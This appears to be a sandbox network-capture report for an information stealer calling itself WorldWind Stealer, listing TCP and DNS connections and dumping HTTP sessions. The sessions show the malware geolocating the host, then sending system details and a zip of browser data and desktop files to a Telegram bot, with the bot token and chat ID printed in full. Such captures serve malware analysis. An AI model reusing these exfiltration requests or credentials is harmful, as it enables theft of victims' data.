Aug 30, 2024 07:14:12.278203011 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.284759998 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.284785986 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.284986019 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.285264015 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.285279036 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.897008896 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.899463892 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.899488926 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:13.361268044 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:13.361349106 CEST	443	49715	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:13.361406088 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:13.369272947 CEST	49715	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:13.845694065 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:13.845745087 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:13.845823050 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:13.847848892 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:13.847867012 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.485069990 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.487570047 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.487600088 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.797959089 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.802109003 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.802148104 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.803453922 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.803467035 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.803579092 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.803605080 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.803647995 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.803658962 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.803853989 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.803878069 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.803992987 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804011106 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804032087 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804054976 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804161072 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804177999 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804207087 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804220915 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804335117 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804352999 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804372072 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804380894 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804383039 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804392099 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804665089 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804687023 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804719925 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804738045 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804783106 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804796934 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.804847002 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.804860115 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:14.805051088 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:14.805054903 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.135950089 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.136038065 CEST	443	49716	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.136140108 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.137645960 CEST	49716	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.139863968 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.139904976 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.140063047 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.140625954 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.140636921 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.790297031 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:16.800209999 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:16.800240993 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.097672939 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.098459959 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.098488092 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.098609924 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.098614931 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.098726988 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.098745108 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.098959923 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.098963976 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.098988056 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099001884 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099003077 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099026918 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099041939 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099109888 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099126101 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099129915 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099145889 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099229097 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099242926 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099246025 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099253893 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099272013 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099296093 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099328041 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099340916 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099459887 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099468946 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099478006 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.099493027 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.099577904 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.109415054 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.588478088 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.588613987 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:17.588668108 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:17.591398954 CEST	49721	443	192.168.2.6	149.154.167.220

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 07:14:08.881264925 CEST	58963	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:14:08.890199900 CEST	53	58963	1.1.1.1	192.168.2.6
Aug 30, 2024 07:14:08.945246935 CEST	53386	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:14:08.952404976 CEST	53	53386	1.1.1.1	192.168.2.6
Aug 30, 2024 07:14:09.462364912 CEST	52768	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:14:09.471705914 CEST	53	52768	1.1.1.1	192.168.2.6
Aug 30, 2024 07:14:11.160358906 CEST	56552	53	192.168.2.6	1.1.1.1
Aug 30, 2024 07:14:11.167337894 CEST	53	56552	1.1.1.1	192.168.2.6
Aug 30, 2024 07:14:40.591720104 CEST	53	54667	162.159.36.2	192.168.2.6
Aug 30, 2024 07:14:41.172399044 CEST	53	50368	1.1.1.1	192.168.2.6

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 07:14:08.962904930 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Aug 30, 2024 07:14:09.410106897 CEST	534	IN	HTTP/1.1 200 OK Date: Fri, 30 Aug 2024 05:14:09 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=oaaHnqx2Z8keEZfNSGRuZyh3tubqd1j.VcmwFNv_sZo-1724994849-1.0.1.1-TRefTfZuNgq_wNfuhp68yJr1lu5MqKJXHBqPBGnMH.tbCSNDHlc6wXgIfkITh4Z2D5cMNwLAZbwtYMR51QvWww; path=/; expires=Fri, 30-Aug-24 05:44:09 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8bb24bb089074289-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
2024-08-30 05:14:10 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-08-30 05:14:11 UTC	777	IN	HTTP/1.1 200 OK Date: Fri, 30 Aug 2024 05:14:11 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Fri, 30 Aug 2024 05:14:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krVpqYsT6V3vzt9ak4GH2eu1KWcUMVL0CxTXQZOFZHPbzUIPW2ybFNhvlChmAsSVr3GQr1L6%2BtUx0GI3WxfntOLf7YegSR8Hxvs1eShavNVD9%2Bh1dLQ7gNIc81XmyQOVWoPt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8bb24bb50876429b-EWR alt-svc: h3=":443"; ma=86400
2024-08-30 05:14:11 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 34 39 39 34 38 35 30 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1724994850}

Timestamp	Bytes transferred	Direction	Data
2024-08-30 05:14:11 UTC	1761	OUT	GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-08-30 05:14:12 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 30 Aug 2024 05:14:12 GMT Content-Type: application/json Content-Length: 2076 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-30 05:14:12 UTC	2076	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 30 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 34 34 39 33 34 32 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 79 20 73 6b 69 64 2c 20 61 64 64 20 6d 65 20 6f 6e 20 64 69 73 63 6f 72 64 3a 20 5f 6d 61 72 76 69 6d 5f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 63 6b 69 6e 47 75 73 65 72 73 5f 64 61 74 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 39 31 33 36 36 32 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 72 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 6e 6e 79 5f 48 6f 6f 64 61 5f 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d Data Ascii: {"ok":true,"result":{"message_id":81098,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"}

Timestamp	Bytes transferred	Direction	Data
2024-08-30 05:14:12 UTC	171	OUT	GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-08-30 05:14:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 30 Aug 2024 05:14:13 GMT Content-Type: application/json Content-Length: 322 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-30 05:14:13 UTC	322	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 30 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 34 34 39 33 34 32 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 79 20 73 6b 69 64 2c 20 61 64 64 20 6d 65 20 6f 6e 20 64 69 73 63 6f 72 64 3a 20 5f 6d 61 72 76 69 6d 5f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 63 6b 69 6e 47 75 73 65 72 73 5f 64 61 74 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 39 31 33 36 36 32 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 72 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 6e 6e 79 5f 48 6f 6f 64 61 5f 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d Data Ascii: {"ok":true,"result":{"message_id":81099,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"}

Timestamp	Bytes transferred	Direction	Data
2024-08-30 05:14:14 UTC	254	OUT	POST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1 Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8" Host: api.telegram.org Content-Length: 187378 Expect: 100-continue
2024-08-30 05:14:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-08-30 05:14:14 UTC	40	OUT	Data Raw: 2d 2d 30 33 33 39 61 37 32 30 2d 33 37 39 66 2d 34 37 62 35 2d 61 61 37 65 2d 61 65 66 37 39 66 36 62 36 34 62 38 0d 0a Data Ascii: --0339a720-379f-47b5-aa7e-aef79f6b64b8
2024-08-30 05:14:14 UTC	277	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 5c 65 6e 67 69 6e 65 65 72 40 38 34 39 32 32 34 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 25 35 43 65 6e 67 69 6e 65 65 72 25 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C5b36406dec02be6919cea39af9325731%5Cuser%
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 1c cd a3 86 72 01 00 00 31 04 00 00 17 00 00 00 44 Data Ascii: PKj0YBrowsers\Edge\PKj0YBrowsers\Google\PKYQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKYr1D
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: 19 39 45 b3 7d a5 b6 ec 26 bb ed 5a df 1f b4 68 c8 df c4 c1 48 81 c0 a0 62 5f 2b a5 25 74 2e ae 6d 2b 39 b7 ae 9d 32 24 c1 ef ef 1f 50 4b 03 04 14 00 00 00 08 00 e9 15 45 57 4d 16 48 75 84 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 53 46 50 55 53 41 46 49 4f 4c 2e 64 6f 63 78 0d 92 49 8e 45 21 0c 03 f7 2d fd 43 01 61 0c 63 48 78 c0 fd 0f d2 ec 90 00 3b 8e 6b ba 2e 53 b9 d8 32 14 a6 2a ec 2b 27 f9 9c f9 e6 9d e1 b3 b0 36 e1 a2 31 92 90 3a 5f fe 44 34 47 b4 d5 b5 8d 9f b2 b1 0c 1b 6f bd 95 14 8c ae f8 7a 53 a0 13 ec 3c fc 15 97 ae bf 40 3c 57 35 41 49 2f 94 3b f5 8b 7e a9 b5 8f 5d 06 6d c0 52 92 c7 99 5a 93 e3 4f 06 88 f6 04 9a 22 9d 5a d7 3e 15 b6 d4 Data Ascii: 9E}&ZhHb_+%t.m+92$PKEWMHu6Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.docxIE!-CacHx;k.S2*+'61:_D4GozS<@<W5AI/;~]mRZO"Z>
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: cf f8 50 28 67 21 40 f1 fe 07 f1 77 43 07 bc b0 6f c4 53 d7 f0 10 4c 14 93 9e f7 8a 56 2d 56 0f de 9d e4 71 59 84 cb 7a dc b8 9e b0 9e 00 fd d9 60 eb 50 ee dc 11 20 a4 c7 a6 28 b7 75 60 1f 66 d1 78 f9 f2 38 f4 d2 b6 2a 8e 33 a7 1a 9b b6 d8 68 ef 19 ed bb cb d1 f1 23 9d 33 46 5b 9d c6 ed a7 1e a3 0a 87 a7 f8 2d 21 85 1a 6d 9a 5d e4 6c 27 af 46 d0 d9 5f ff 8d aa 59 19 bb f9 56 74 ab f5 5e 9e 05 92 3b 51 6f e9 0a 74 c4 1d 1c 7e ca 0d 96 51 5b a9 f3 35 c8 7d 2c ce 21 47 57 50 5f 1b 8c 21 32 a3 5f 7d c7 9a e5 de 2e 39 3e 64 54 3e 91 66 a9 2d 5b bd 3d 48 ab c7 94 10 b4 5d 9f 82 d3 49 7f 56 dc 25 c3 d0 5e ed 1e 94 1e 71 14 17 44 f9 9c 1b 9a 1c 85 ce a2 cc b9 2d 5f af de f4 86 59 b1 86 92 ca fb 54 02 d8 20 8d ac 99 c5 e8 fd 59 ad b5 45 68 b3 81 eb 7e 6b e0 d3 72 Data Ascii: P(g!@wCoSLV-VqYz`P (u`fx8*3h#3F[-!m]l'F_YVt^;Qot~Q[5},!GWP_!2_}.9>dT>f-[=H]IV%^qD-_YT YEh~kr
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: ba 24 cd 8d 19 9f 5b b6 df 5a c5 75 5b 52 4c 62 4b 31 41 d8 76 d3 0a 6c c3 61 65 7b 6d 3d 33 52 50 4c 52 f2 c3 6e d5 fc 86 bb f8 49 94 cb 8b 62 19 b0 87 2c c5 29 dd d4 e8 9b c2 b1 bd c7 81 d7 da 4b 13 cc 16 20 4f a3 d5 32 3b e6 ce a6 00 3b 10 35 02 2b 47 d1 9e 80 56 9f 51 50 ba af db bd 33 9e 2b 62 87 d9 18 ad 3d a4 ea 2b ed be c9 5e ad 54 4d 9c 7a ca d0 f3 34 ba cf 9d ca 5e eb b3 0e ef b9 56 1d 2e c0 39 a8 66 f2 76 c4 2c d7 57 57 8c 85 ee 20 9c 33 9d 22 e5 8e c7 a1 c9 db 32 38 44 aa 45 a0 96 cd 9a 07 b5 b2 3b ee 34 9f 82 98 26 de b9 6a 0d 1e be 9a f6 d5 71 dc 7a db c3 b2 6b 8a 64 d3 8e a0 eb 2e 3e 02 e5 7a 0e 4e 27 ea dc a5 5d f2 b8 f2 6c ef 80 78 c2 75 46 0e c5 af f1 e1 69 1a d2 96 96 e3 33 2d b9 4b 76 b4 a9 de 6b 29 03 1a a6 7b 6b 67 3c a2 4c f2 a8 88 Data Ascii: $[Zu[RLbK1Avlae{m=3RPLRnIb,)K O2;;5+GVQP3+b=+^TMz4^V.9fv,WW 3"28DE;4&jqzkd.>zN']lxuFi3-Kvk){kg<L
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: 0f af 2b dc 90 cc a4 1e 4b 0c dc 58 fb ef a3 d0 10 37 26 f4 e3 3d b6 6a fb 91 63 59 61 aa a5 8a 77 c1 35 dd 1e ec 97 c1 e8 de af a6 ef 24 5d d7 17 75 df c1 ed 7b a2 25 52 5d ee ed 56 31 9b e0 ee 07 1b ab f2 e3 52 a2 e6 33 91 1d 31 68 fe 9a c3 dc c4 c9 8b 7b 4a 3d 46 1c 57 9a 5b 15 1d 22 c4 1a 41 29 38 3e 41 5a 7a 3e 96 9e 58 cb 53 f6 56 ec 9a 0b 7e b1 a9 68 8c 90 fd 76 ee f3 d8 66 d3 4c 33 28 7e c5 88 85 b2 e7 89 19 a7 29 7a 75 3a 44 99 95 fe c4 6c 43 04 ec 1a 1f c7 77 ac c9 78 4f be 6d 47 eb 6a a3 86 39 87 47 f2 a9 d3 79 32 2b 56 ad eb 55 5c f2 0e 63 af 82 5f ab 5a f4 34 f8 1d 71 a6 05 1f 97 4c 63 55 f9 82 22 57 0a 4a 8c a3 52 3f 47 e2 31 98 e7 7e bc e4 28 35 3d db 5a 5a 78 68 e4 1a bd 7d d7 a1 4e db e5 4b cb 82 89 7a db b5 d2 23 05 df b5 f2 d9 55 e3 38 Data Ascii: +KX7&=jcYaw5$]u{%R]V1R31h{J=FW["A)8>AZz>XSV~hvfL3(~)zu:DlCwxOmGj9Gy2+VU\c_Z4qLcU"WJR?G1~(5=ZZxh}NKz#U8
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: 40 07 90 b3 02 00 00 67 3d 00 00 12 00 00 00 53 79 73 74 65 6d 5c 57 69 6e 64 6f 77 73 2e 74 78 74 dd 5b db 8e 9a 50 14 7d d6 af e0 b1 7d 28 39 77 c0 37 c7 11 75 2e c6 5b 83 4e 48 8c e8 a9 63 bd 60 01 8b f6 eb 4b cd 8c 71 d2 4e 9a b4 3e b8 ce ab c0 f1 2c d8 6b ed b5 f7 86 76 f5 b1 5e b1 ea cb a7 9e df 99 75 bb ed fe b0 fe bd 11 3c 94 4b 83 d6 e0 a1 38 d2 d6 b9 35 98 44 d6 27 ab 11 c7 f3 95 b6 6a cf 49 bc d6 e5 52 a7 75 5b b1 98 74 49 b9 54 1f 16 27 d6 2a 61 27 89 e7 c9 64 6d f9 8b 95 4e ad 0f 7b 57 7d 0c a3 a4 de 5d a5 b5 20 98 cc 77 bb 7e ef 87 1f 35 6e 83 aa 3f f5 3f 77 82 69 de 1c 6e ef 9e ee 9b d1 7d f1 5f a3 cd 5d b2 1a 35 1e b7 bd 64 f7 6d ee 7f 6d af 77 37 a3 c9 b4 93 0c a3 28 59 26 cb ae 1f fe b6 4d 5b ef 75 b9 dc fe 2f 0c 92 2a 81 8e 81 ba f8 cf Data Ascii: @g=System\Windows.txt[P}}(9w7u.[NHc`KqN>,kv^u<K85D'jIRu[tIT'a'dmN{W}] w~5n??win}_]5dmmw7(Y&M[u/
